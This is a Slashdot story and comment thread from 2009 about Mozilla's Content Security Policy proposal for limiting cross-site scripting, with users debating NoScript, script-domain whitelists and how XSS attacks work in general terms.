Please create an account to participate in the Slashdot moderation system

 



Forgot your password?
typodupeerror
×
Security Mozilla The Internet

New Firefox Standard Aims to Combat Cross-Site Scripting 160

Al writes "The Mozilla foundation is to adopt a new standard to help web sites prevent cross site scripting attacks (XSS). The standard, called Content Security Policy, will let a website specify what Internet domains are allowed to host the scripts that run on its pages. This breaks with Web browsers' tradition of treating all scripts the same way by requiring that websites put their scripts in separate files and explicitly state which domains are allowed to run the scripts. The Mozilla Foundation selected the implementation because it allows sites to choose whether to adopt the restrictions. 'The severity of the XSS problem in the wild and the cost of implementing CSP as a mitigation are open to interpretation by individual sites,' Brandon Sterne, security program manager for Mozilla, wrote on the Mozilla Security Blog. 'If the cost versus benefit doesn't make sense for some site, they're free to keep doing business as usual.'"
This discussion has been archived. No new comments can be posted.

New Firefox Standard Aims to Combat Cross-Site Scripting

Comments Filter:
  • as an end user (Score:2, Insightful)

    by Anonymous Coward

    I really hope the default policy is "only allow scripts from the current domain" and "do not allow the site to override my choice".

    • Re: (Score:3, Informative)

      by seifried ( 12921 )

      It doesn't quite work that way, it's much more fine grained, i.e. as a site owner I can say something like:

      allow /foo/bar.cgi?weird looking strings and block anything else

      so if an attacker finds a cross-site scripting flaw in say "/login.php" the client won't accept it, protecting my client, and protecting the site owner as well (bad guys aren't harvesting credentials from users, etc.).

      • by kill-1 ( 36256 )

        No, CSP doesn't work like that. You can't specify path patterns or something like that. If you have an XSS flaw on your site an attacker still can inject scripts. But the scripts won't get executed because CSP only allows external scripts from white-listed hosts.

        • by seifried ( 12921 )
          Ack I must have been thinking of mod_security, my bad. OTOH you can limit stuff by file/etc to a pretty good degree using site security policy and achieve pretty much the same aims.
        • That is the problem - a mandatory restriction that amounts to "we don't trust the html generated from our own domain".

    • Re: (Score:2, Funny)

      by sexconker ( 1179573 )

      As an end user I really hope that the sites I visit have a default policy of "we only serve up our own shit". ...

      Fuck.

      • by LDoggg_ ( 659725 )
        Javascript libraries for things like browser abstraction and animations are really nice, but they're getting kinda of bulky.
        Content delivery networks like AOL and Google are hosting them for free, so it makes sense for websites to just include them and use the big guys' bandwith.
      • by tepples ( 727027 )

        As an end user I really hope that the sites I visit have a default policy of "we only serve up our own shit".

        Then I guess you don't visit Wikipedia, eBay, or any other site that allows its subscribers to submit works to be displayed on the site.

    • Re: (Score:3, Interesting)

      by Arker ( 91948 )

      I really hope the default policy is "only allow scripts from the current domain" and "do not allow the site to override my choice".

      Noscript does this.

      Which brings me to the observation that, at least as far as I can tell from the blurb, this entire thing sounds a bit redundant in light of the ready availability of Noscript. Why not just make it part of the default firefox install instead?

      • Re:as an end user (Score:5, Insightful)

        by Spad ( 470073 ) <slashdot@ s p a d . co.uk> on Tuesday June 30, 2009 @12:53AM (#28524717) Homepage

        Because, as a user I might not know which of the 47 different domains that CNN pulls scripts from are *supposed* to be serving scripts and which are some guy trying to get my facebook account details (not that I have one or read the CNN site regularly; largely because of the number of bloody domains they pull scripts from), whereas the owners of the CNN site *will* know which domains they're supposed to be pulling scripts from and can state so to the browser.

        • Re: (Score:3, Insightful)

          by Arker ( 91948 )

          Because, as a user I might not know which of the 47 different domains that CNN pulls scripts from are *supposed* to be serving scripts and which are some guy trying to get my facebook account details (not that I have one or read the CNN site regularly; largely because of the number of bloody domains they pull scripts from), whereas the owners of the CNN site *will* know which domains they're supposed to be pulling scripts from and can state so to the browser.

          Sounds like a bug rather than a feature to me. Th

          • Re:as an end user (Score:5, Insightful)

            by xouumalperxe ( 815707 ) on Tuesday June 30, 2009 @08:01AM (#28526935)

            NoScript solves a different problem, which is that you don't trust the site. What this aims to solve is the problem of knowing what the site itself considers trustworthy, so that you're not required to issue a blanket statement of distrust: If you trust the site, you can (supposedly) trust its own trust list.

        • here,here, mod up....ooops used them all up, very informative you are though!!!
          I would mod you up, if they could give me more then just 5 damn points!

        • The page from the primary domain refers to scripts on those other domains as a matter of trust. If CNN doesn't trust a domain's scripts, then they won't refer to them in the first place!

          OTOH if the http connection is being attacked (say from an infected system on the LAN) and references to bad domains are being injected, then that could be a real problem but not one that is solved by this new feature. Only https would prevent this attack.

      • After the stunt the noscript author pulled with adblock's filterset, I will never use it again. It simply cannot be trusted. It is malware.

  • by Red Flayer ( 890720 ) on Monday June 29, 2009 @05:18PM (#28520823) Journal
    I will still run with noscript installed because I've yet to see a good XSS-preventing implementation that will allow *me*, as a user, to easily define what sites can run scripts on the sites I visit. And when I visit a site where I need to disable noscript, I have no other tabs/browsers open.

    I'm sorry, but NO site can be trusted 100% from a user's perspective... and giving site owners the tools to help prevent XSS from their side doesn't help with the fact that users still shouldn't trust absolutely.

    The reason something like this scares me is that it lulls users into a higher level of trust... and doesn't protect them from hacked sites, or sites that choose not to implement this.

    Of course, I'm slightly paranoid. And of course, this isn't transparent to Joe Sixpack, so he's going to trust|!trust based on whatever it is he's basing it on now. And for security-critical sites like banks, this is a good thing... but I try very hard to make sure my friends & family are a bit paranoid too, so they'll take precautions.
    • I will still run with noscript installed because I've yet to see a good XSS-preventing implementation that will allow *me*, as a user, to easily define what sites can run scripts on the sites I visit

      Dude. How are *you* going to know that it is ok to run scripts on Slashdot.org that originate from slashdotscripts.com and not scriptsforslashdot.com? Even if you are a lunatic and micromanage the trusted sources of these scripts, how would selectively running any of them do you any good? I would imagine almos
      • by Red Flayer ( 890720 ) on Monday June 29, 2009 @05:52PM (#28521215) Journal

        How are *you* going to know that it is ok to run scripts on Slashdot.org that originate from slashdotscripts.com and not scriptsforslashdot.com? Even if you are a lunatic and micromanage the trusted sources of these scripts, how would selectively running any of them do you any good?

        Dare I say it?

        Site XXXX is attempting to run a script on site YYYY.
        (C)ANCEL or (A) LLOW?

        All snark aside, why would I allow either of those domains to run a script on slashdot.org? Since I trust slashdot to a certain extent, I would allow from scripts.slashdot.org. But allowing scripts from a completely different domain? No way.

        The point is that my security policy is annoying to implement. For site mybank.com I need to enable scripting. But if things were perfect, I could enable only for scripts from $SUBDOMAIN.mybank.com, so I don't get hosed by scripts from $HACKERSITE.bankmy.com. And if legitimate sites are hosting their scripts from an entirely different domains... well, that would have to change. Instead I have to take an all-or-none approach, since the sites I need security the most on are the ones where I need to enable scripting. That just sucks.

        • Re: (Score:2, Insightful)

          by maxume ( 22995 )

          Slashdot is currently pushing js from c.fsdn.com.

          I think you have a pretty dim view of the ecosystem (or maybe you are viewing some really marginal sites, who knows). For the most part, a given page that you visit is not going to contain malicious code that sniffs for when you have a https cookie for your banking site and then mysteriously steals all your money. I say this confidently, as I am quite certain that the bad guys are much happier with the simpler task of installing mal-ware keyloggers.

          The only b

          • And I know that fsdn.com is also a trusted site.

            You're right that I'm not the most knowledgeable (to put it lightly) about the ecosystem. However, I think it's atrocious that I cannot easily and selectively block scripts from operating on sites I want to view. And not just for the sake of security... also for the sake of performance on older machines.
            • Re: (Score:3, Insightful)

              by Zey ( 592528 )

              And I know that fsdn.com is also a trusted site.

              Funnily enough, I know I don't want fsdn.com's content because the side bar is annoying bloatware that cripples the utility of the site. I'm very glad to have NoScript on the case, blocking it for me. (Which makes me wonder how many other horror websites there are out there whose horrible bloat I've been saved from by virtue of my browsers blocking XSS.)

          • Slashdot is currently pushing js from c.fsdn.com.

            And I'm not running any of 'em. And I never have.

        • That would be like paypal.com inexplicably using paypalobjects.com [robtex.com]! Unpossible.

        • why would I allow either of those domains to run a script on slashdot.org?

          You wouldn't. Slashdot would. This is about the site creator specifying a white list, and not about the visitor being prompted about it.

          But if things were perfect, I could enable only for scripts from $SUBDOMAIN.mybank.com, so I don't get hosed by scripts from $HACKERSITE.bankmy.com.

          Am I misunderstanding the description of this extension, because to me this sounds exactly like what it does. You enable scripts from domains you specify. Thus, no javascript injections or form hacking will get a page to retrieve foreign scripts without the attacker being able to physically alter the document.

      • Re: (Score:2, Interesting)

        by Anonymous Coward

        That reminds me -- since recently I have to tell NoScript to allow scripts from fsdn.com in order to browse slashdot.org successfully. I *know* that FSDN is slashdot's parent company, but it doesn't seem right that I can't use slashdot's discussion interface without giving permission to all of FSDN.

        Similarly, recently I have to allow gstatic.com and/or googleapis.com to use Google-enabled websites that worked fine before.

        Like the parent post's point: it's getting harder for a user to selectively narrow per

    • Well, it irritates me to no end that there isn't a mandatory listing of all the sites that serve scripts for them complete with some sort of explanation.

      I absolutely hate having to figure out which domain that I've blocked that will allow access to the content and which ones are dodgy. And further whether the site that's serving up the content is safe enough to allow.
      • If you're slightly paranoid like I am, how would you know to trust the provided list of "trusted script serving sites"?

        At some point, you need to trust *someone* to tell you who else you can trust... and that'll always be a problem.
        • by tepples ( 727027 )

          If you're slightly paranoid like I am, how would you know to trust the provided list of "trusted script serving sites"?

          The web server is telling you a list of sites that it trusts to serve scripts to be run in its pages.

      • by Jurily ( 900488 )

        What irritates me is that all the browsers I've ever heard of run everything they can by default. The only distro coming even close to something sane is Gentoo with the "restrict-javascript" USE flag with firefox (that pulls in noscript, but still does not enable it by default).

        Of course I can't know about everything, feel free to correct me.

    • Indeed, I wish noscript would allow me to whitelist domains and even specific scripts on a per-site basis. So, for example, I could whitelist maps.google.com's use of javascript from gstatic.com but not allow any other sites, like images.google.com, to pull in javascript from gstatic.com.

    • I second "yay!" for Noscript. You have no idea how tangled commercial websites are until you use noscript.
    • eBay and MySpace? (Score:3, Insightful)

      by POWRSURG ( 755318 )

      CSP is effectively server-side NoScript. And it isn't exactly new either. This has been in development as a Firefox extension for at least a year. The article mentions it being first crafted back in 2005.

      The issue I take with this article is that they suggest this feature could even possibly be integrated into eBay or MySpace. These two giants seem like the exact opposite type of market that would use this -- any site that allows users to post their own data is not going to possibly survive the wrath they w

      • Re: (Score:3, Informative)

        by kill-1 ( 36256 )

        Apparently, you have no idea what XSS means. Neither eBay or Myspace allow the execution of user-provided scripts for obvious reasons. Given the market share of Firefox, the big sites will implement CSP pretty soon.

    • by MikeFM ( 12491 )

      I've been suggesting a fix like this for years but my suggested implementation let users have add further limitations. It's stupid not to let users tighten controls even if they can't make controls any weaker than the site has configured. You'll never have perfect security but at least this is a step in the right direction.

    • by dveditz ( 11090 )

      The reason something like this scares me is that it lulls users into a higher level of trust... and doesn't protect them from hacked sites, or sites that choose not to implement this.

      This mechanism isn't intended for users -- this is a tool for site authors, to cooperate with them in enforcing their policies. The site still has to make a best effort at implementing those policies themselves to protect all their visitors using browsers that don't support CSP (which includes every officially released versio

  • Cost vs. Benefit? (Score:4, Interesting)

    by spydabyte ( 1032538 ) on Monday June 29, 2009 @05:22PM (#28520883)

    If the cost versus benefit doesn't make sense for some site, they're free to keep doing business as usual.'

    The author gave the best reason for not implementing this.

    The benefits of this, and other various security implementations, won't be seen until it's tested. The costs of testing? Way too high compared to the current cost of operation. This is a very hard proof-of-concept problem, and unless this is already built into development standards, I doubt any deployments would switch.
    Which would you take, the option which delays production for a week, or the option to just hit "next"?

    • Of course it doesn't. For the most part sites that are vulnerable aren't made to pay for the damage that their lack security has caused. If we forced sites to pay for their mistakes, that would change things really fast.

      The TD Ameritrade settlement for instance was an absolute joke, they ended up losing a lot of personal information and then they ended up with a slap on the wrist. It's not going to be cost effective for organizations to secure their sites as long as they're free to pass on the cost to th
  • by seifried ( 12921 ) on Monday June 29, 2009 @05:23PM (#28520897) Homepage
    Shameless self plug: I wrote about this in my column: Web security - Protecting your site and your clients [linux-magazine.com] in September of 2008 and I'm VERY glad to see this is moving forwards as it means I (as a site owner) can actually do something to protect my site and my users against flaws in my site that is relatively easy and non-intrusive (that's the key!). The thing I really love about this is if your clients don't support site security policy, things still work, and if your browser supports it but the remote web site doesn't, things still work, but if both ends support it you get a nice added layer of protection. What would be really wild is if Microsoft added support for it, although "not invented here" they have been making efforts to protect users from XSS attacks in IE8 with mixed success, so who knows. You can do similar things with mod_security potentially and outgoing filters but it is nowhere near as simple as site security policy should be to deploy (hopefully).
    • I (as a site owner) can actually do something to protect my site and my users against flaws in my site that is relatively easy and non-intrusive (that's the key!).

      Unless your users run something besides Firefox.

      If MS did this we'd all be crying about how this isn't sanctioned by W3C, and it's "embraceandextend" (tag?).

      • Re: (Score:3, Informative)

        by node 3 ( 115640 )

        If MS did this we'd all be crying about how this isn't sanctioned by W3C, and it's "embraceandextend" (tag?).

        Extinguish.

        It's Embrace, Extend, Extinguish. That last E makes all the difference in the world.

  • Presumably the millions of adsense and publishers will have to enable their sites to maintain adverts..? Might hit google revs a bit...
    • Obviously if a site does not contain one of these headers it will default to allow from all. Also called not breaking the whole internet with your new browser feature.

  • The XSS FAQ (Score:3, Informative)

    by mrkitty ( 584915 ) on Monday June 29, 2009 @05:33PM (#28521015) Homepage

    The Cross-site Scripting (XSS) FAQ http://www.cgisecurity.com/xss-faq.html [cgisecurity.com]
  • What about IE, Chrome, Opera, and Safari users? As of now this solution only benefits a small portion of users. I don't see this being widely implemented at all.
    • Re: (Score:3, Insightful)

      by hansamurai ( 907719 )

      Well, if Firefox users find it effective, then other companies will follow suit. It's just a standard Mozilla is adopting, though it seems to have been defined in house, that won't stop anyone else from using it.

    • IE has an XSS Filter... I don't use IE enough to have bothered to investigate it though, otherwise Opera, Safari, Chrome, don't seem to be doing anything special about XSS, at least not advertising it, other than patching their own vulnerabilities against a few known methods.

  • The first trap you will fall into thinking about this is that it should be the end-all security policy, and will solve our problems. It won't. That's not the intent, and also impossible given our diverse browser ecosystem.

    The ability to tell the browser, via out-of-band, non XSS-able information, that certain scripts should not be executed, however, is a very powerful defense in depth measure, and makes it one step harder for attackers to make an attack work.

    Security is a war of attrition. Bring it on.

  • NOT a standard (Score:3, Informative)

    by Curate ( 783077 ) <craigbarkhouse@outlook.com> on Monday June 29, 2009 @05:36PM (#28521051)
    The summary is wrong, this is NOT a standard in any way, or even a proposed standard. This is a proprietary security feature being introduced by Firefox. I'm not saying this is a bad thing (it's not), or that this won't eventually become a de facto standard (it might). But it is not a standard.
  • Standard? (Score:3, Informative)

    by pablodiazgutierrez ( 756813 ) on Monday June 29, 2009 @05:42PM (#28521113) Homepage

    More than a "Firefox standard", it seems to me that this is an extension. I'm all for it, but let's call things by their name.

  • just like they have forced the 'humongous, scary ssl warning error' instead of the previous acceptable and understandable error message. it forced a lot of small businesses who used the certificates they themselves signed to buy 3rd party certificates from vendors. again with this change, all small businesses will have to spend more on web development charges, because most end users will set their firefox to the prevent setting for this new feature. the 'free to do business is usual' bit is bullshit. rememb

    • Your last paragraph reminds me, hey Firefox is open source, let's just fork it!

    • Anyone doing business should have a legitimate SSL certificate for the site and not use a self-signed certificate. Anyone using a website should be wary of any business site using a self-signed certificate.

      Self-signed certificates are okay for personal servers where you know you or a friend signed the cert, but if you're doing business it is a VERY BAD IDEA to use or trust self-signed certs. Firefox's behavior is correct in this regard.

  • RFC? (Score:4, Insightful)

    by Midnight Thunder ( 17205 ) on Monday June 29, 2009 @05:47PM (#28521179) Homepage Journal

    Is this 'standard' endorsed by anyone else or written up as part of an RFC? Calling something a standard when you are the only guys doing sounds like a certain company that was started by Bill and Paul.

    I am not trying to troll here, since I am all for the solution, I am just ensuring that this properly documented and shared by the right entities (think W3C).

    • Re: (Score:3, Informative)

      I should have the read the article first, since no where in the article do they mention the word 'standard'. When they do decide to make it happen I do hope the submit the proposal to the right organisations, as to avoid making this a one browser standard.

    • by blair1q ( 305137 )

      Bill and Paul made about $100 billion and their bugs have become the standard that most "standards" can't dislodge.

      Anyone can proclaim a "standard", recall what "RFC" stands for? It's not "peer-reviewed and passed by governing bodies."

      If Mozilla is saying this is how they're building it into the code base, W3C can ignore it, but it's W3C who won't be compatible with what is standard.

    • I was thinking the same thing. If this was Microsoft, Apple or even Google claiming a "new standard" based on a feature only they've adopted (and even created) they would quite rightly get chewed out. The only way something anyone does alone (especially if they're still the minority in terms of market share) could be considered a "standard" is if your attitude to language is exceptionally flexible.

  • Massive Overkill (Score:3, Informative)

    by butlerm ( 3112 ) on Monday June 29, 2009 @05:56PM (#28521259)

    This proposal looks like massive overkill to me. Implementing the restriction on inline script tags is equivalent to saying - our web developers are incompetent and naive and cannot be trusted to take basic security measures, so we feel making our web development practices more cumbersome and inefficient (if not impossible) is a healthy trade off.

    A more effective program would be to develop and promote standardized html sanitization routines for popular web development languages, so that user entered html could easily be accepted under certain restrictions. Most web logs do this already.

    Alternatively a less draconian solution would be to allow inline scripts to execute if the script tag includes a response specific serialization value that is also present in the HTTP headers. 64 bit values would make forging a inline script essentially impossible, because there would only be a 1/2^64 probability of a subsequent accidental match.

    • our web developers are incompetent and naive and cannot be trusted to take basic security measures so we feel making our web development practices more cumbersome and inefficient (if not impossible) is a healthy trade off.

      The real question is, can YOU trust your web developers? And is this really that more cumbersome and inefficient than every other measure? It's just another tag. In fact, it is *just* a tag. It is also in the source of the problem - the web browser. You could argue everything else is a workaround, and finally we are getting help from the people responsible for inventing the problem.

      A more effective program would be to develop and promote standardized html sanitization routines for popular web development languages

      Yes, except, this is not easy, it is already being done, and it isn't quite working.

      If one tag could eliminate the risk of exte

      • by butlerm ( 3112 )

        It is not "just a tag" - it is a header that enables a mandatory restriction on inline scripts in addition to selective restrictions on other elements. And if you have incompetent web developers for a public facing site, you are likely to have much more serious problems than unfiltered user content.

        One of the serious problems with this is many applications dynamically generate javascript on the fly. The only way to handle that under this specification would be to generate lots of little temporary files tha

      • Re: (Score:2, Informative)

        by arndawg ( 1468629 )

        Hackers can just fire up a different browser, so the number of hackers this will stop are exactly ZERO.

        It's not about stopping hackers from running these scripts. It's to protect the users if a hacker have managed to insert a remote script via a form on the webpage. It protects users running firefox if the site have implemented the tag.

  • Please don't let this become the same horrors, that it is with plugins.

    If you ever tried to add a applet or anything embedded into a site, that came from some other domain (like a mp3 stream), you will know what I am talking about.
    It just gets blocked, except if you have a signed certificate and other shit, that you can only get for money. And then it is still a huge mess to set up.

    In my eyes this stifled web technology quite a bit.

    Additionally, what do you do, when you yourself have several domains and sub

  • So is there an official definition of "Cross-Site Scripting" somewhere? Since that phrase started to be used in scary security stories a few years ago, I've been collecting the definitions that various stories provide, and I've been a bit disappointed. Mostly, they aren't even "definitions", in the usual dictionary sense of the term. I.e., I can't use most of the purported "definitions" to decide whether what I'm looking at is an instance of the phrase. And in general, no two stories or sites seem to us

    • by TheRaven64 ( 641858 ) on Tuesday June 30, 2009 @07:30AM (#28526665) Journal

      My impression is that "Cross-Site Scripting" is an empty scare phrase that really just means "anything involving two different machines and a script -- whatever that may be".

      Cross site scripting is exactly what it sounds like; running a script from one site in another site's security sandbox (i.e. scripting across sites). The script tag allows scripts to be loaded by a page from any site. These scripts then run in the same namespace and sandbox as any other scripts on that page. It's basically the web equivalent of an arbitrary code execution vulnerability. It isn't quite as bad as the client-side version, because there is (in theory) no way of escaping from the sandbox that the browser constructs from each site.

      If you don't properly sanitise user-provided data then it's quite easy[1]. Imagine, for example, that Slashdot allowed arbitrary HTML. If it did then I could put a script tag in this post referring to a script in my domain. Your browser would then load this script and run it as if it were provided by Slashdot. If you enter your password, I could harvest it. Even if you don't, my script could send HTTP requests to Slashdot with your login credentials and post spam. If you've entered personal information in your user profile, I could harvest this.

      You probably don't have any private information on Slashdot, so it's not a particularly attractive target for identity theft, but the large number of page views means that it might be useful for spam. Imagine, for example, a cross-site scripting vulnerability being used so that everyone with excellent karma who went to the Sony story posted something written by Sony PR.

      For sites like eBay, it's much more important. These sites have full names, postal addresses, and often credit card numbers. If I can run a script in their pages' sandbox then I can access all of this information as the user enters it.

      This idea is for each domain to provide a whitelist of domains that are allowed to provide scripts (or other resources). If I persuade eBay's code to load a script from my domain then FireFox can check my domain name against the list published by eBay, see that it is not there, and refuse to run the script.

      [1] This isn't the only way of persuading a site to load your scripts, but it is the simplest to explain.

      • by jc42 ( 318812 )

        Well, yeah; I've done lots of web scripting, and I get all that. I've even written demos of the dangers, usually to try to impress on others (such as managers) why it's a potential threat to users. This hasn't usually been too successful, as shown by the fact that those people usually continue to run their browsers with scripting enabled.

        My question wasn't about how you write web scripts. My question is why you'd add a modifier like "cross-site" to it. Defining it as a script on one machine (the server)

        • Ah, I see the problem. You can't read. Let's go back to my post. I said:

          Cross site scripting is exactly what it sounds like; running a script from one site in another site's security sandbox (i.e. scripting across sites)

          You somehow read this as:

          Defining it as a script on one machine (the server) which runs on another machine (the client) adds no information, because that's how almost all web scripting works

          Note the difference between your definition and mine. My definition (shared by everyone else) involves three computers:

          • Computer 1 serves the page (site 1).
          • Computer 2 serves the script (site 2).
          • Computer 3 is the client and runs the script from site 2 in the security snadbox for site 1 (i.e. it is a cross-site script).

          If site 2 is not operated by a trusted party, then this is a cross-site scripting vulne

  • I'm a bit out of my league knowledge-wise here, but in my company I have a company web application that would benefit very much from being able to do something in the window of another site. Why can't a browser (not the web app) be set to very specifically allow a particular web application to make use of another specified website. E.g. that would allow me to fill out a form with data from the web app or vice versa to get data into my MySQL database without having to fill out the data manually, which is err

    • by LDoggg_ ( 659725 )
      You can do cross site scripting right now using JSONP. Basically include a script with a callback function name and run an eval on the response. The object you really want as a response is placed in as the parameter to your callback.
      It's extremely useful when you are able to trust the other host.

      However, if you don't trust the other host, you shouldn't be including their script in the first place. Because that script may contain something like a javascript function to send the cookies of the first domain
  • Next step: educate PHP users so that they have a clue about security?

  • Well, it's about time somebody does something. For years JavaScript has been an on/off affair, and it's been driving me nuts both as a web surfer and a developer.

    They can do whatever they want for Joe Average to ensure advertisers won't complain, but please, can I have the ability to allow scripts to run only from the same domain as the originating page? Please? Just a simple checkbox will do, thank you.

    • by Dan541 ( 1032000 )

      Your suggestion is absurdly logical, hence it shall not pass.

      Why do all the good ideas get by-passed? Is it some sort of "nerd pride", that we must never do things the easy way.

A committee takes root and grows, it flowers, wilts and dies, scattering the seed from which other committees will bloom. -- Parkinson

Working...